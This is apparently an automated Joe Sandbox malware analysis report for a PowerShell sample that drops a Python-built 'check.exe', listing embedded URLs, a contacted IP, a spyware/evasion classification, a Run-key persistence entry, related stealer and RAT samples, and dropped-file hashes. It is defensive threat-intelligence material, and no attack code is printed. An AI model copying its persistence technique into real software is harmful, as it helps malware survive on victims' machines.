                                                                                                        http://www.accv.es00check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.python.org/psf/license/)check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pycheck.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2738181811.0000029FD9BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://google.com/check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://mahler:8092/site-updates.pycheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.securetrust.com/SGCA.crlcheck.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://.../back.jpegcheck.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)check.exe, 00000005.00000003.2279631020.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD98B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://httpbin.org/postcheck.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcecheck.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://github.com/Ousret/charset_normalizercheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.firmaprofesional.com/cps0check.exe, 00000005.00000002.2739408419.0000029FDA190000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crl.securetrust.com/SGCA.crl0check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacheck.exe, 00000005.00000002.2735970218.0000029FD7678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://yahoo.com/check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.securetrust.com/STCA.crl0check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://html.spec.whatwg.org/multipage/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.quovadisglobal.com/cps0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlcheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscheck.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.rfc-editor.org/rfc/rfc8259#section-8.1check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://requests.readthedocs.iocheck.exe, 00000005.00000002.2739097916.0000029FDA0E4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://repository.swisssign.com/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crl.xrampsecurity.com/XGCA.crlcheck.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920pcheck.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.python.orgcheck.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://www.accv.es/legislacion_c.htm0Ucheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://www.aiim.org/pdfa/ns/id/check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://ocsp.accv.es0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.python.org/check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://json.orgcheck.exe, 00000005.00000003.2314207522.0000029FD959B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://docs.python.org/3/howto/mro.html.check.exe, 00000005.00000002.2736560958.0000029FD92C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packagecheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://twitter.com/check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://stackoverflow.com/questions/4457745#4457745.check.exe, 00000005.00000002.2739551780.0000029FDA1E8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2740761730.0000029FDA960000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://www.quovadisglobal.com/cpscheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_modulecheck.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              104.20.23.46
                                                                                                                                                                                              		nodejs.orgUnited States
                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1570493
                                                                                                                                                                                              Start date and time:2024-12-07 06:44:08 +01:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 13m 17s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:28
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:download.ps1
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal68.spyw.evad.winPS1@30/433@1/1
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 50%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 59%
                                                                                                                                                                                              • Number of executed functions: 64
                                                                                                                                                                                              • Number of non-executed functions: 400
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .ps1

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                                              • Execution Graph export aborted for target check.exe, PID 3608 because there are no executed function
                                                                                                                                                                                              • Execution Graph export aborted for target check.exe, PID 5300 because there are no executed function
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              00:45:10API Interceptor36x Sleep call for process: powershell.exe modified
                                                                                                                                                                                              00:45:27API Interceptor3x Sleep call for process: check.exe modified
                                                                                                                                                                                              00:45:28API Interceptor3x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                              00:46:03API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                              06:45:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                              06:45:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              104.20.23.46check.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                az10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  nodejs.orgcheck.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.20.23.46
                                                                                                                                                                                                                  check.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.20.22.46
                                                                                                                                                                                                                  az10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.20.23.46
                                                                                                                                                                                                                  sDKRz09zM7.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • 104.20.22.46
                                                                                                                                                                                                                  kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 104.20.22.46
                                                                                                                                                                                                                  bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.20.23.46
                                                                                                                                                                                                                  bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.20.23.46
                                                                                                                                                                                                                  8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                  • 104.20.22.46
                                                                                                                                                                                                                  KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                  • 104.20.23.46
                                                                                                                                                                                                                  AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                  • 104.20.23.46

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 172.67.165.166
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                                                                  Overdue_payment.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                                                                  https://m.frownpasture.top/xqbgOoR7LyCdyD4DEHLii/a8f4AAdjCXhECXlkXzJZXUg0VwwMXxcvBW8NcRstA0McXyNaQkY?_t=1733539511823#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.216.178
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 172.67.165.166
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 172.67.165.166
                                                                                                                                                                                                                  Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 162.159.61.3

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dllcheck.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    check.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      az10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        Update_4112024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          Update_4112024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            PyQtScrcpy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              PyQtScrcpy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                active.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  PumpBotPremium.msiGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                    Bypass Apk.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_f58d6737a278c17bbf3304669ee8828e0d15e7d_9c0b4d08_17bef922-448d-48bc-b5e4-9bfd86550170\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.360186894118187
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RC7TuBS0PRjyjoRXgvvi7g2GZUExN+r5L6Gvn0vT21xwnGKYt+tOVIOv1SnYzuii:07SBZPRjyj8Hwn7yRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:9CF6CC27A236CFE78B048B2A020DF276
                                                                                                                                                                                                                                      SHA1:3B3A0DD400919A5CCFAE8D78EC649F544473F638
                                                                                                                                                                                                                                      SHA-256:96CFB67537BAE798A34A96CB3F3D7781C40D44D7876E74BA7644E4F7F42B7DEE
                                                                                                                                                                                                                                      SHA-512:F793D2F8345BB7CC37C0751AF448224C9F2A73847F5BBF58FC8575252FFC6A89636A6930DE9347163440D9AD0D4A45CAD5C5E8AEE35227B7BA19565047CCB77C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.0.2.3.9.5.4.2.9.9.8.3.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.0.2.3.9.5.5.4.2.4.8.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.b.e.f.9.2.2.-.4.4.8.d.-.4.8.b.c.-.b.5.e.4.-.9.b.f.d.8.6.5.5.0.1.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.e.4.4.9.b.a.-.0.8.7.0.-.4.2.c.1.-.8.f.f.b.-.d.3.0.3.f.7.1.a.1.3.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.b.4.-.0.0.0.1.-.0.0.1.4.-.b.8.2.0.-.6.d.4.2.6.b.4.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.f.2.5.9.9.8.8.8.5.a.e.0.c.f.7.b.d.e.0.3.3.2.8.a.5.2.9.7.a.d.8.8.f.c.c.4.2.8.0.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.5.:.0.6.:.2.4.:.3.2.!.2.4.f.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_f58d6737a278c17bbf3304669ee8828e0d15e7d_9c0b4d08_8b9939e4-ea3a-415f-b7e5-6c6202da0bac\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.3590099566284821
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:NvTTu6hS0PRjyjoRXBeuL7pfngN9uNnqQyDnUn9WSfEownGTY0PchVIhv1SnYzuP:RSEZPRjyjMfwnyNRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:E6568BEF7E898F6313931308658388AD
                                                                                                                                                                                                                                      SHA1:FC6E0A9132F2B8F2B105F52E5DB450096CCB0E5B
                                                                                                                                                                                                                                      SHA-256:58029F733E3EC5BD9968E46A7A5DED1E6458B3A3EB8DB196190F993615DB71BF
                                                                                                                                                                                                                                      SHA-512:8B9082573BF107B5E9806BA09D3EEA708FDDF72A2AFDAB0D6E8353B952BC11B9B788BA58778B2C50FF2F308D7C1CE15236873F798B69F15DA21B954D5602B1CC
                                                                                                                                                                                                                                      Malicious:false
